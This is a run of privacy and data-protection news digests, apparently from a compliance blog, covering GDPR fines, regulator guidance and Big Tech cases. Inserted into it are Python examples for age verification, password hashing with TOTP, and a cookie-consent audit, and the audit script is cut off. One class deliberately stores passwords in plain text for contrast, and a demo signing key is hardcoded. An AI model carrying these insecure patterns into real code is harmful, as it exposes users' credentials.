Bird&Bird offers the latest Global Cookie Review – the legal and regulatory landscape relating to the expanding use of cookies and similar technologies, country by country. Such regulations often follow a path set by the EU GDPR and ePrivacy Directive. The report also contains Asia Pacific, Latin American, and South African overviews, where similar regulations are often lacking or can be even divergent on transparency and consent requirements. 

The UK Information Commissioner’s Office has published design tests to support designers of products or services that are likely to be accessed by children or young people. Each test provides a report detailing areas of good practice as well as ways to improve conformity with the Age-Appropriate Design Code. This includes “best interests of the child” standards like age authentication, safe default settings, parental controls, enforcement, and data protection impact assessments.

Investigations and enforcement actions: credit rating by mistake, “dormant” risk assessment, “defaulting” customers error, employees’ email metadata, mass grocery purchases monitoring, and workers’ fingerprinting

The Norwegian data protection authority has notified Recover of its decision to fine the company 20,000 euros. The matter concerns a credit rating performed without a legal basis. The background to the fine is a complaint from a private individual who was subjected to a credit assessment without any form of customer relationship or other connection to the above company. A credit rating is established after compiling personal data from many different sources including a person’s overall financial situation, any payment remarks, debt-to-income ratio, and whether the person has any mortgages/liens.

The Norwegian regulator also has given Statistics Norway notice of a decision that involves a ban on their planned collection of data on the Norwegian population’s grocery purchases. Through the collection of bank data and bank transaction data, the organisation planned to obtain information on what the population buys, and then link that to socio-economic data such as household type, income, and education level. The regulator believes that a legal basis, (societal benefit of consumption and diet statistics), is not clear and predictable enough for this planned processing of personal data. Even if the purpose is to produce anonymous statistics, intrusion into the individual’s privacy will occur. 

Italian regulator Garante fined Areti 1 million euros: thousands of users were mistakenly classified as “defaulting” customers and unable to switch to other suppliers. The misalignment of the company’s internal systems led to incorrect data migration to the integrated information database consulted by suppliers before signing a new contract. As a result, more than 47,000 Areti customers wanting to change energy supplier were denied an account activation and any potential savings deriving from market advantages, because they were incorrectly red-flagged. 

Additionally, Garante issued a fine to Lazio Regio of 100,000 euros for unlawful monitoring of employees’ email metadata. An internal audit was launched by the region on the suspicion of a possible unauthorised disclosure to third parties of information protected by official secrecy. Metadata was collected in advance and stored for 180 days: date, time, sender, recipient, subject, and size of email. This allowed the region to obtain information relating to employees’ private lives, such as their opinions or contacts. 

No workplace fingerprinting without specific requirements is the ruling from Garante, which fined a sports club 20,000 euros. The authority intervened following a report from a trade union, which complained about the introduction of the biometric system by the company, despite the union’s request to adopt less invasive means of authentication. The company had carried out, for almost four years, the fingerprinting of 132 employees, violating the principles of minimisation and proportionality. It also provided workers with very little information on the characteristics of the biometric processing.

The Romanian data protection authority completed an investigation at leading retailer Kaufland and issued a fine of 3000 euros. A video recording containing images of a complainant in the parking lot of one of the chain’s stores appeared on the web page of a local newspaper. It turned out that the store manager had allowed an employee access to the monitoring room, where the employee captured, with his personal mobile phone, images of the video recordings that were playing and sent them via WhatsApp to a third party. The images were later posted by an online publication. As a result, the image and the registration number of the car were revealed, with two persons affected by this incident.

The EDPB published a summary on risk assessment and acting in accordance with established procedures. A controller, (in Poland), was notified of a personal data breach that occurred as a result of a break-in at an employee’s apartment and the theft of a laptop. The confidentiality of the personal data was at risk because the stolen computer was only password protected. The controller had kept adequate documentation since the beginning of the application of the GDPR and had performed a risk assessment, but it was only after the data breach occurred that the controller complied with the results of its own risk assessment by encrypting laptop hard drives.

Data security:  zero trust architecture, IoT onboarding, and lifecycle management

The US NIST’s National Cybersecurity Center of Excellence has published a draft practice guide on implementing a zero trust architecture and is seeking the public’s comments on its contents. As an enterprise’s data and resources have become distributed across the on-premises environment and multiple clouds, protecting them has become increasingly challenging. Many users need access from anywhere, at any time, from any device on-premises and in the cloud. Comments from industry participants are welcomed by or before 6 February. 

In parallel, the NIST is also seeking comments on draft guidance on Trusted IoT Onboarding and Lifecycle Management. Scalable mechanisms are needed to safely manage IoT devices throughout their lifecycles, beginning with secure ways to provision devices with their network credentials—a process known as trusted network-layer onboarding. In combination with additional device security capabilities such as device attestation, application-layer onboarding, secure lifecycle management, and device intent enforcement, this could improve the security of networks and IoT devices from unauthorised connections.

Big Tech: face recognition practices by PimEyes, Epic Games’ COPPA violations, TikTok app age ratings

The Baden-Württemberg data protection authority announced proceedings against PimEyes, (face recognition and reverse image search), Data Guidance reports. Recent media reports stated that PimEyes scans faces on the internet for individual characteristics and stores biometric data without a proper legal basis, an identified data sharing model, or valid opt-out options. A data subject should be able to agree to the processing of personal data relating to them in an informed and unambiguous manner. In the case of automated retrieval of images on the Internet, these requirements cannot be met. Equally, a private company such as PimEyes cannot undertake police investigative work in the public interest or interfere with the rights of data subjects. Read the original statement here.

US Video Game Maker Epic will pay a more than half-billion dollar refund over allegations of children’s privacy law, (COPPA), violations, and tricking users into making unwanted charges for in-game items, (eg, costumes and dance moves). Epic’s Fortnite game has more than 400 million users worldwide. The company will be required to adopt strong privacy default settings for children and teens, (parental notice and consent requirements), ensuring that voice and text communications are turned off by default. This is the Federal Trade Commission’s largest refund award in a gaming case and the largest administrative order in its history. 

Finally, Virginia Attorney General joined 14 other state attorneys general to call on Apple and Google to take immediate action and correct their application store age ratings for TikTok. The change will help parents protect their children from being force-fed harmful content online. The current ratings of “T” for “Teen” in the Google Play App store and “12+” in Apple’s App Store falsely represent the objectionable content found and served to children on TikTok. While TikTok does have a “restricted mode” available, it is also aware that many of its users are under 13 and have lied about their age to create a profile.

The post Data protection & privacy digest 16 Dec – 2 Jan 2023: US signals intelligence redress mechanism, “dormant” privacy risk assessment, data brokerage appeared first on TechGDPR.

Weekly digest 25 July – 1 August 2022: UK publishes new data protection draft bill and updates BCRs
https://techgdpr.com/blog/weekly-digest-02082022-uk-publishes-new-data-protection-draft-bill-and-updates-bcrs/
Tue, 02 Aug 2022 07:29:13 +0000

TechGDPR’s review of international data-related stories from press and analytical reports.

Legal processes: UK new data protection draft bill, rules to prevent child abuse online

A new UK data protection draft bill was published on a parliamentary website. This document is intended to update and simplify the UK’s data protection framework to reduce organisational burdens while maintaining high data protection standards. The bill was introduced to the House of Commons and given its first reading on 18 July. This stage is formal and takes place without any debate. MPs will next consider it at the second reading on 5 September. The main provisions of the bill include:

  • greater flexibility on how to comply with certain aspects of the data protection legislation (eg, relying on legitimate interest or amending the requirement for controllers to keep logs relating to processing);
  • improving the clarity of the framework, particularly for research organisations;
  • more certainty and stability for cross-border flows of personal data;
  • changes to the Privacy and Electronic Communications Regulations 2003, relating to the confidentiality of terminal equipment, (eg, cookie rules), unsolicited direct marketing communications, (eg, nuisance calls), and communications security (eg, network traffic and location data);
  • a framework for providing digital verification services in the UK to secure those services’ reliability and enable digital identities to be used with the same confidence as paper documents;
  • a wider application of provisions on information standards, extending to persons including providers of IT, IT services or information processing services used, or intended for use, in connection with the provision of health care or adult social care in England;
  • smart data schemes to allow for the secure sharing of customer data, (eg, held by a communications provider or financial services provider), upon the customer’s request, with authorised third-party providers;
  • use of personal data for law enforcement and national security purposes.

Meanwhile, the Irish government has approved the expansion of the Data Protection Commission, (DPC). The intention is to appoint two additional commissioners to support the evolving organisational structure, governance and business needs of the DPC. The appointments are to be made following the Data Protection Act 2018, which allows up to three commissioners to be appointed. The commission and its stakeholders, like the Irish Council for Civil Liberties, have regularly highlighted the increased working burden and investigative complexity. Ireland is a notable one-stop shop for the Big Tech companies headquartered in the EU. The DPC’s GDPR enforcement capacity, especially its cross-border aspects, has also been a point of debate in recent years across Europe. 

The EDPB and EDPS have adopted a joint position on the proposal for a regulation of the European Parliament and of the Council laying down rules to prevent and combat child sexual abuse. The proposal lacks clarity on critical elements, such as the notions of “significant risk”. Furthermore, the entities in charge of applying those safeguards, starting with private operators and ending with administrative and/or judicial authorities, enjoy a very broad margin of appreciation, which leads to legal uncertainty on how to balance the rights at stake in each case. The EDPB and EDPS also believe scanning audio communications is particularly intrusive and must remain outside the scope of the obligations in the proposed regulation, both concerning voice messages and live communications. The regulators express doubts regarding the efficiency of blocking measures and consider that requiring providers of internet services to decrypt online communications to block those concerning CSAM would be disproportionate.

Official guidance: UK BCRs, use of biometric data, age verification online

The UK Information Commissioner’s Office, (ICO), has released updated guidance on GDPR-governed Binding Corporate Rules, (BCRs), application forms, and tables for data controllers and processors. The concept of BCRs to provide adequate safeguards for making restricted transfers was developed under EU law and continues to be part of UK law under the UK GDPR, (specifically, Art. 47). BCRs are intended for use by multinational corporate groups, groups of undertakings or enterprises engaged in a joint economic activity such as franchises, joint ventures or professional partnerships. The guidance is intended to assist controllers when preparing the UK BCR pack for approval: the application form, the binding instrument, and any supporting documents. EU and UK BCR requirements currently overlap in both jurisdictions. Therefore, the ICO has simplified the UK BCR approval process for applicants.

The Spanish privacy regulator AEPD published a blog post, (in Spanish), on the use of biometric data from a data protection perspective. Biometric data processing techniques are based on collecting and processing people’s physical, behavioral, physiological, or neural traits through devices or sensors, creating signatures or patterns that enable the identification, monitoring, or profiling of people. Some methods require the cooperation of the individual. In contrast, other methods can capture biometric data remotely, without requiring the cooperation of the individual and without the individual being aware of it. When demonstrating that the processing complies with the GDPR, it is useful to classify biometric operations by: 

  • purpose of the biometric operation in relation to the purpose of the processing, 
  • legal framework,
  • scope of the processing,
  • qualified human intervention,
  • transparency,
  • free choice of the data subject,
  • adequacy, sustainability and necessity,
  • minimum data,
  • degree of user control,
  • implicit collateral effects of the biometric operation, (eg, proctoring), etc.

How to perform age control on a website? The French CNIL offers some effective and privacy-friendly solutions. After analyzing existing systems, the French privacy regulator recommends developing new solutions. Age control to protect young people is compatible with the GDPR, provided that sufficient guarantees are presented to minimize privacy breaches and prevent age control from being an opportunity for publishers to retrieve additional data on Internet users visiting their site. In addition, it is necessary to avoid the data being captured by a third party for malicious uses, (biometric data breach, phishing, spoofing, blackmail). 

It is possible to verify age through an automated credit card check or by facial analysis of facial features. However, these solutions must be operated by third parties with sufficient security and reliability to avoid data theft and ensure that the additional risks generated by their use are considered. Another solution is possible, says the CNIL, but presents specific technical difficulties or a lower maturity. In this case, a trusted third party is provided with reliable proof of age by an administration or a company that knows the Internet user and can certify his age. This proof would then be transmitted by the trusted third party or by the user himself to the site to which the user requests access. The system recommended by the CNIL would provide triple protection of privacy:

  • the person providing proof of age knows the identity of the user, but does not know which site is being visited;
  • the person who transmits the proof of age to the site may know the site or service consulted, but does not know the identity of the user;
  • the site or service subject to age verification knows that the user is of legal age and that a person is consulting it, but does not know their identity.
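The three-party exchange just described, as an added example that is not the CNIL’s code: a provider that knows the user issues a minimal, signed, single-use proof bound to a random site challenge, the user relays it, and the site verifies it without learning who the user is. The provider’s user records, the HMAC key (standing in for a public-key signature) and every value are constructed for illustration.

```python
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Constructed records held by the proof-of-age provider (the party that already
# knows the user, e.g. a bank or an administration). Example code written for
# this digest, not the CNIL's.
PROVIDER_USERS = {"alice": {"birth_year": 1990}, "bob": {"birth_year": 2012}}
ADULT_AGE = 18
TOKEN_TTL_SECONDS = 300

# Assumption: an HMAC key shared by provider and site stands in for the
# provider's signature. A real deployment would use an asymmetric signature so
# the site, holding only the public key, could verify but never mint proofs.
PROVIDER_KEY = b"constructed-demo-key-not-for-production"


def _canonical(payload: dict) -> bytes:
    """Stable serialisation so signer and verifier hash identical bytes."""
    return json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()


def _sign(payload: dict) -> bytes:
    return hmac.new(PROVIDER_KEY, _canonical(payload), hashlib.sha256).hexdigest().encode()


def provider_issue_proof(username: str, nonce: str,
                         now: Optional[float] = None,
                         current_year: Optional[int] = None) -> dict:
    """Provider side: sees the user's identity and the site's random challenge,
    but never the site. Emits only a boolean claim, not a birth date."""
    now = time.time() if now is None else now
    current_year = time.gmtime(now).tm_year if current_year is None else current_year
    age = current_year - PROVIDER_USERS[username]["birth_year"]
    payload = {
        "over_age": age >= ADULT_AGE,    # minimal claim: no name, no date of birth
        "nonce": nonce,                  # binds the proof to one site challenge
        "exp": now + TOKEN_TTL_SECONDS,  # limits how long a proof stays usable
    }
    return {"payload": payload, "sig": _sign(payload).decode()}


class Site:
    """Service subject to age verification: learns 'of age or not', nothing else."""

    def __init__(self) -> None:
        self._pending = set()  # challenges issued and not yet redeemed

    def new_challenge(self) -> str:
        # Random bytes carry no information about the site to the provider.
        nonce = secrets.token_hex(16)
        self._pending.add(nonce)
        return nonce

    def verify(self, token: dict, now: Optional[float] = None) -> bool:
        """Accepts a proof once: signature, freshness and challenge must all match."""
        now = time.time() if now is None else now
        payload = token.get("payload", {})
        if not hmac.compare_digest(_sign(payload), str(token.get("sig", "")).encode()):
            return False                   # forged or tampered
        if payload.get("exp", 0) < now:
            return False                   # stale proof
        nonce = payload.get("nonce")
        if nonce not in self._pending:
            return False                   # unknown challenge, or already used
        self._pending.discard(nonce)       # single use blocks replay
        return bool(payload.get("over_age"))


def run_flow(username: str, now: float, current_year: int) -> tuple:
    """User-relayed exchange: site challenge -> provider proof -> site check."""
    site = Site()
    nonce = site.new_challenge()
    token = provider_issue_proof(username, nonce, now, current_year)
    return token, site.verify(token, now)


if __name__ == "__main__":
    token, ok = run_flow("alice", time.time(), time.gmtime().tm_year)
    print(json.dumps(token), "->", ok)
```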

Investigations and enforcement actions: vehicle rental, progressive health research, wrongful patient referral, passwords in plain text, cookie violations

The supervisory authorities, (SAs), of the Baltic States launched coordinated preventive supervision on the compliance of personal data processing in the field of short-term vehicle rentals, the EDPB reports. The SAs have agreed that supervision will be carried out on enterprises whose main recipients of services are natural persons (eg, electric scooters). Primarily, merchants whose principal place of business is located in one of the Baltic States and who offer their services throughout the Baltics will be monitored. At its own discretion, each SA may extend the scope of the supervision to the activities of enterprises that are active in only one Member State.

The EDPB has published a selection of cases of strategic importance where there is a likely high risk to the rights and freedoms of natural persons. The degree of public debate and media attention is not included as a separate criterion, but the data protection authorities can take these factors into account. A proposal may be made if it concerns:

  • a structural or recurring problem in several Member States;
  • a case related to the intersection of data protection with other legal fields;
  • a case that affects a large number of data subjects in several Member States;
  • a large number of complaints in several Member States; 
  • a fundamental issue falling within the scope of the EDPB strategy;
  • a case where the GDPR implies that high risk can be assumed, such as the processing of special categories of data, processing regarding vulnerable people such as minors, situations where a data protection impact assessment, (DPIA), is required, or situations where a DPIA is required based on the criteria for processing operations that are likely to result in high risk (as laid down in the EDPB Guidelines).

The Italian privacy regulator ‘Garante’ gave a favorable decision on the processing of data by a hospital aimed at the study of patients suffering from neoplastic, infectious, degenerative, and traumatic pathologies of the thoracic region. The project envisages the creation of a database and research activity in nine areas that will be the subject of further specific protocols and submitted to the competent ethics committees for each area. To give the green light, however, the authority asked the researchers to base the collection – and the subsequent processing of health data for medical research purposes – on “progressive stages” consent. 

Garante previously authorized the collection and storage of data in the “Torax” database based on an initial consent expressed by patients at the time of participating in the study, provided that the hospital subsequently acquired specific consent from the patients. Garante also ruled on the case of deceased or no longer contactable patients, and required the research projects to be better defined and approved by the territorially competent ethics committees. The authority has favorably taken note of the technical measures implemented by the hospital to eliminate the risk of patient identification, deeming them suitable for ensuring the anonymization of the data processed. However, the company must periodically check these measures and adjust them where necessary.

Meanwhile, the Polish supervisory authority UODO imposed an administrative fine on the University Clinical Center of the Medical University of Warsaw. The decision was due to the failure to notify the UODO of a breach of personal data protection and the failure to notify the data subject. A patient received a referral from a doctor to a specialist clinic containing personal data about another person: their name, surname, address, identification number, information about the diagnosis and purpose of the advice. The controller confirmed that there was a mistake in entering another patient’s personal data on the referral to a specialist clinic. Still, after analyzing it, it concluded that the referral used the personal data of a person who did not exist in reality. Although the controller qualified the incident as a security incident, it was not considered to have significant effects on the rights and obligations of the data subject. 

In the opinion of the UODO, there was a breach of personal data protection consisting of the disclosure of personal data to an unauthorized person, (another patient), as a result of an error by a doctor issuing a referral to a specialist clinic. The document issued by the doctor contained only one mistake in the patient’s favour. However, the rest of the data contained in the referral, eg, name, address, and identification number, did apply to the patient. Hence, it cannot be considered that the event concerned a non-existent person. Despite the mistake to this person’s advantage, they can be easily identified.

The Danish data protection authority criticized and issued two orders to EG Digital Welfare ApS. The IT system Mediconnect offered by EG is used, among other things, by municipalities, regions, and insurance companies to handle sensitive and confidential information about citizens. In this context, EG acts as a data processor for the Mediconnect IT system. It appears from the case that passwords are stored in the Mediconnect IT system in plain text, opening the possibility of access to special categories of data that are protected only by username and password. The regulator issued an order to carry out irreversible encryption (one-way hashing) of passwords, and to ensure that the login solution does not rely exclusively on a username and password (eg, multi-factor login, certificates, tokens, or a PKI solution).
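An added illustration of the two orders, not EG’s Mediconnect code: the plain-text pattern is kept only for contrast beside a one-way PBKDF2 store, and a login routine that also requires an RFC 6238 one-time code so that username and password alone never suffice. The user names, passwords and iteration count are constructed; the TOTP secret is the RFC 6238 test key.

```python
import hashlib
import hmac
import os
import time
from typing import Dict, Optional, Tuple


class PlaintextStore:
    """The criticised pattern: anyone who reads the table reads the secrets."""

    def __init__(self) -> None:
        self.records: Dict[str, str] = {}

    def register(self, user: str, password: str) -> None:
        self.records[user] = password

    def check(self, user: str, password: str) -> bool:
        return self.records.get(user) == password


# Assumption: PBKDF2-HMAC-SHA256 from the standard library; the iteration count
# is a constructed value to be tuned against the real login hardware.
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16


class HashedStore:
    """Irreversible storage: only salt, parameters and digest are kept."""

    def __init__(self) -> None:
        self.records: Dict[str, Tuple[bytes, int, bytes]] = {}

    @staticmethod
    def _derive(password: str, salt: bytes, iterations: int) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)

    def register(self, user: str, password: str) -> None:
        salt = os.urandom(SALT_BYTES)  # per-user salt defeats precomputed tables
        digest = self._derive(password, salt, PBKDF2_ITERATIONS)
        self.records[user] = (salt, PBKDF2_ITERATIONS, digest)

    def check(self, user: str, password: str) -> bool:
        record = self.records.get(user)
        if record is None:
            # Derive anyway so an unknown user costs the same time as a wrong password.
            self._derive(password, b"\x00" * SALT_BYTES, PBKDF2_ITERATIONS)
            return False
        salt, iterations, digest = record
        return hmac.compare_digest(self._derive(password, salt, iterations), digest)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time code (HMAC-SHA1) used as the second factor."""
    counter = (unix_time // step).to_bytes(8, "big")
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def login(store: HashedStore, user: str, password: str, code: str,
          totp_secret: bytes, now: Optional[int] = None) -> bool:
    """Login that never succeeds on username and password alone."""
    now = int(time.time()) if now is None else now
    if not store.check(user, password):
        return False
    # Accept the current and the previous 30-second step to tolerate clock drift.
    return any(hmac.compare_digest(totp(totp_secret, now - d), code) for d in (0, 30))


def stored_in_clear(store, user: str, password: str) -> bool:
    """Audit check: is the secret itself recoverable from the stored record?"""
    return password in str(store.records.get(user))


if __name__ == "__main__":
    weak, strong = PlaintextStore(), HashedStore()
    for s in (weak, strong):
        s.register("nurse1", "Tr0ub4dor&3")  # constructed credentials
    print("plain-text store leaks password:", stored_in_clear(weak, "nurse1", "Tr0ub4dor&3"))
    print("hashed store leaks password:", stored_in_clear(strong, "nurse1", "Tr0ub4dor&3"))
```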

Spain’s AEPD fined Vueling Airlines 30,000 euros for cookies violations. According to the complaint, when accessing Vueling’s website, users could not reject cookies or purchase tickets without accepting the sending of commercial communications and promotions. Vueling’s misuse of cookies on its website constituted a violation of Art. 22 of the country’s Information Society Services and Electronic Commerce legislation. The AEPD imposed on Vueling the above fine, which was subsequently reduced to 18,000 euros following Vueling’s admission of guilt and the voluntary payment of the fine.

Audits: an insurance company’s data processing


The UK ICO has audited Somerset Bridge Insurance Services Ltd data processing. The company agreed to it consensually. It was agreed that the audit would focus on direct marketing: the processes in place where an organisation undertakes marketing activities directed at customers on their database and/or obtained from third-party lists. This would include controls for management structures, policies, and procedures, monitoring and reporting, training, fairness and transparency, lawful consent, accuracy and integrity of records, operations, and data subjects’ rights. The summary of the audit was as follows:

  • The company processes personal data from customers obtaining insurance quotes and policies. 
  • It collects personal data directly from its customers through its website, aggregator sites, or telephone calls.
  • It only relies on active opt-in consent for any form of marketing, including via email, phone, or SMS. 
  • It currently does not use soft opt-in. Electronic marketing is mainly through a monthly newsletter. Each email to the customer includes the option to unsubscribe.
  • It does not process special category data when processing data for marketing purposes. 
  • Automated marketing calls are not made. 
  • It does not buy in marketing lists from third parties. 

The ICO auditors reported a high level of assurance that the direct marketing activities conducted by the company were compliant with the UK GDPR, DPA 2018 and the Privacy and Electronic Communications Regulations. 

Data security: ransomware attacks

The EU cybersecurity agency ENISA stated that ransomware is one of the most devastating types of cybersecurity attack over the last decade and has grown to impact organisations of all sizes across the globe in the last year:

  • About 10 terabytes of data were stolen each month by ransomware threat actors. 58.2% of the data stolen included employees’ data.
  • At least 47 unique ransomware threat actors were found.
  • For 94.2% of incidents, it is unknown if the company paid the ransom.
  • When negotiation fails, the attackers usually publish the data on their web pages. This happens often and is a reality in 37.88% of incidents.
  • The remaining 62.12% of companies either came to an agreement with the attackers or found another solution.

Several different ransomware business models emerged from the study: a) individual attackers; b) ransomware-as-a-service model; c) a data brokerage model; and d) a model aimed mostly at achieving notoriety. Thus the ENISA report recommends the following:

  • keep an updated backup of your business files & personal data;
  • keep this backup isolated from the network;
  • apply the 3-2-1 rule of backup: 3 copies, 2 different storage media, 1 copy offsite;
  • run security software designed to detect most ransomware in your endpoint devices;
  • restrict administrative privileges, etc.

Big Tech: Paramount Global, US tech in Russia, TikTok in US, Manchester City’s smart scarf

Paramount Global, owner of CBS, is facing a class action lawsuit that alleges the Hollywood giant tracked and collected CBS.com subscriber data and sold it to Facebook without users’ consent. Paramount is accused of violating the Video Privacy Protection Act, and Facebook has already acknowledged that it uses CBS.com subscriber data, via the Facebook Tracking Pixel that Paramount uses.

Russia continues to tighten the regulatory screws on US tech firms, with fines imposed on Snapchat, WhatsApp, and Tinder for failing to store the data of their Russian users on local servers. Local data storage is a requirement since a 2019 law, although many western companies have fallen foul of it, and the number is growing.

China’s TikTok has paid a 92 million dollar settlement in a 2019 case brought in a Federal court in Illinois, alleging multiple data protection and privacy violations and illegal collection of biometric data. As part of the deal, TikTok must now restrict and disclose in its privacy policy what it collects and end the secret sending of data overseas.

Tech incorporated in clothes gives you useful feedback on a range of things. Now Manchester City have made their fans a scarf that gives the club loads of information about the wearer’s match experience. An EmotiBit sensor can read blood pressure, heart rate, emotional arousal or stress levels. The club has partnered for the pilot stage with Cisco, tech and production company Unit9, and sports marketers Octagon UK, although Man City is being coy for the moment about just what personal data will be collected and shared and with whom.


Weekly digest December 13 – 19, 2021: Grindr’s privacy fine, guide for SMEs and developers, 5G smart factories
https://techgdpr.com/blog/weekly-digest-20122021-grindr-privacy-fine-guide-for-sme-and-developers-biometrics-5g-smart-factories/
Mon, 20 Dec 2021 11:06:05 +0000

TechGDPR’s review of international data-related stories from press and analytical reports.

Grindr’s privacy fine in focus

Norway’s data protection authority has handed Grindr, the world’s largest social networking app for LGBTQ people, a privacy fine of over 6 mln euros for disclosing user data to third parties for behavioural advertising without a legal basis. The offenses were committed before April 2020, when its terms of use and consent management platform were updated. In 2020, the Norwegian Consumer Council filed a complaint against US-based Grindr, saying the app had illegally shared users’ GPS locations, IP addresses, ages, gender, and use of the app. Last week the regulator stated that Grindr shared such data through software development kits included in the Grindr app, often used to facilitate communication between the app and the advertising vendors. At the same time, Grindr failed to comply with most of the requirements for freely given, specific, informed and unambiguous consent and its withdrawal for such data sharing:

  • users were forced to accept the privacy policy through the previous CMP in its entirety to use the app;
  • the consents for sharing data with its advertising partners that Grindr collected were bundled with acceptance of the privacy policy as a whole (users were not asked specifically if they wanted to allow their data to be shared with third parties for ads);
  • the information about the sharing was not properly communicated to users;
  • refusing consent was dependent on the user’s patience and technological understanding, and it did not demonstrate a fair, intuitive and genuine free choice.

Grindr argued that users who pressed “Cancel” when asked to accept the privacy policy could upgrade to the paid version. However, the regulator pointed out that, at the time of registration, users were not given the choice to opt for the paid version of the app. The user would first have to go through the consent mechanism described above. It was only after this process that the user could decide to upgrade to the paid version. 

Grindr also argued that its advertising partners – in the event they would ever theoretically receive sensitive personal data – must “blind” themselves pursuant to Art. 25 of the GDPR, (Data protection by Design and by Default). Participants in the ad tech ecosystem would likely only receive a “blinded” app-ID and not the corresponding app name. However, in a different statement, Grindr also recognised that “all apps and all websites that serve advertising necessarily share the identity of the app and/or the website with their advertising partners. Simply put, it is highly unlikely any advertiser would purchase advertising on an unknown app or an unknown website.” 

The Norwegian regulator however stated that even if the app-ID in some instances was “blinded”, the recipient could still receive keywords relating to the Grindr app. As an example, OpenX, which Grindr considers to be its processor, appended the keywords “gay”, “bi” and “bi-curious” in ad calls. This would have a similar effect to disclosing that the data subject is a Grindr user, and also constitute processing of personal data “concerning” an individual’s “sexual orientation” (Art. 9 of the GDPR). Read the 70-page fine notice of the Grindr case (available in English) with more facts and relevant GDPR provisions explained.

Data breaches, investigations and enforcement actions: ransomware attack, Clearview AI, children’s data

In Finland, a psychotherapy centre was issued a privacy fine over a failure to properly secure the processing of personal data and to report a security breach. The company notified the data protection commissioner in September 2020. The company had found a blackmail message: the patient database had been uploaded to the attacker’s servers and a ransom was demanded to recover the lost data. A sample of the patient database was attached to the threat letter. Later it became clear that the hacking had probably already taken place in 2018, and another hack took place in 2019 due to the poor protection of the patient information system. The data protection impact assessment carried out by the respondent also did not meet the requirements of Art. 35 (7) of the GDPR. Finally, the company did not have a documented notification procedure in place at the time of the security breaches.

French regulator CNIL has ordered US-based Clearview AI, a facial recognition company that has collected billions of publicly-available images worldwide, to stop illegal use of biometric data from people in France and delete it within two months. The UK Information Commissioner’s Office, which worked with the Australians on the Clearview investigation, also said last month it intended to fine Clearview 17 mln pounds for alleged breaches of data protection law.

California-based online advertising platform OpenX Technologies will be required to pay 2 mln dollars to settle Federal Trade Commission allegations that the company collected personal information from children under 13 without parental consent, a direct violation of a federal children’s privacy protection law. The FTC also alleged that despite offering an opt-out option, OpenX collected geolocation information from users who specifically asked not to be tracked. The FTC’s investigation reviewed hundreds of child-directed apps with terms that identified the intended audience as “for toddlers,” “for kids,” “kids games,” or “preschool learning,” and included age ratings for the apps indicating they were directed to children under 13. However, these apps and their data were not flagged as child-directed and participated in the OpenX ad exchange, according to the FTC. 

Legal processes and redress: LED, DMA, DSA, US/AU Cloud Act 

The EDPB published its contribution to the EU Commission’s evaluation of the Data protection Law Enforcement Directive (LED). It is a piece of EU legislation, parallel to the GDPR, which also came into effect in 2018. LED aims at supporting the possibility of police authority co-operation through the exchange of personal data. Previously, EU legal instruments in this area have been limited to data protection rules for EU agencies, large scale IT systems established under EU law or cross-border exchanges of personal data in the context of police and judicial cooperation in criminal matters. However, new legislative and technological developments in the processing of data for law enforcement purposes have increased the workload of EDPB members. Also, data protection authorities may often have to balance their resources between supervision of the GDPR and the LED, noting: “more crucial than the number of available staff are the skills of the experts, who should cover a very broad range of issues – from criminal investigations and police cooperation to big data analytics and AI”.

The EU Parliament is ready to start negotiations with the Council on the Digital Markets Act (DMA). The text, now approved by MEPs, blacklists certain practices used by large platforms acting as “gatekeepers” and enables the Commission to carry out market investigations and sanction non-compliant behaviours. Core services will include not only social networks, search engines, operating systems, online advertising services, cloud computing, and video-sharing services, but also web browsers, virtual assistants and connected TV. The approved text also includes additional requirements on:

  • the use of data for targeted or micro-targeted advertising and the interoperability of services, (eg, number-independent interpersonal communication services, social network services);
  • giving users the option to uninstall pre-installed software applications, such as apps, on a core platform service at any stage. 

The text approved will be Parliament’s mandate for negotiations with EU governments, planned to start in the first semester of 2022. The Digital Services Act (DSA) – a parallel proposal to regulate online platforms dealing with, among other issues, profiling algorithms, deceiving or nudging techniques to influence users’ behaviour through “dark patterns” – is due to be put to the vote in plenary in January. Read also the latest analysis of the DSA’s possible effect on EU residents’ fundamental rights and freedoms by Baker McKenzie.

Meanwhile, Australia and the US signed a CLOUD Act agreement to help law enforcement agencies demand data from tech companies, the Guardian reports. It will allow Australian and US law enforcement agencies to use existing warrants to demand information from overseas-based companies and communications service providers, reducing the time taken to obtain it. “It means companies including email providers, telcos, social media platforms, and cloud storage services could soon find themselves answering warrants from law enforcement agencies based in the US or Australia rather than their home jurisdiction”, the Guardian writes.

Official guidance: SMEs, developers, biometrics, cookies

The French regulator CNIL published a new version of its GDPR guide for developers (in French). The new content relates in particular to the use of cookies and other online trackers and to audience measurement solutions. It also draws up a non-exhaustive list of vulnerabilities behind data breaches notified to the CNIL, and presents examples of measures that would have prevented them. In total, the guide now contains 18 thematic sheets covering most developers’ needs at each stage of a project: identifying and minimising the personal data collected, preparing for the exercise of data subjects’ rights, managing retention periods, and the technical implementation of legal bases.

The CNIL is also continuing its action plan to ensure compliance by companies that use cookies. Since May 2021 the CNIL has sent out around 60 formal notices. Online checks have revealed that a number of organisations still do not allow users to refuse cookies as easily as to accept them, and the CNIL has now decided to send 30 new formal notices. The recent checks found that:

  • cookies subject to consent were placed on the user’s terminal equipment before any choice had been made;
  • information banners are still non-compliant because they do not allow the user to refuse cookies as easily as to accept them;
  • some banners do offer a way of refusing cookies that is as simple as accepting them, but the mechanism is ineffective because cookies subject to consent are still placed after the user has refused.

The sectors particularly affected by these new formal notices are public establishments, higher education establishments, the clothing industry, transport, mass distribution and distance selling.
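The three failure patterns the CNIL describes are mechanical enough to test for before a regulator does. The following is an added example, not CNIL tooling: it replays a recorded consent flow (here a constructed list of Set-Cookie observations and banner interactions) and flags consent-subject cookies placed before any choice or after a refusal, as well as a refuse path that takes more clicks than accept. The essential-cookie allow-list, the event format and the cookie names are the example’s own assumptions.

```python
"""Audit a recorded consent flow for the three cookie failures the CNIL
checks describe. Added example; not CNIL tooling."""
from dataclasses import dataclass

# Assumption for the example: only these cookies are strictly necessary and
# may be set without consent. Everything else is treated as consent-subject.
ESSENTIAL = {"session_id", "csrf_token", "consent_choice"}


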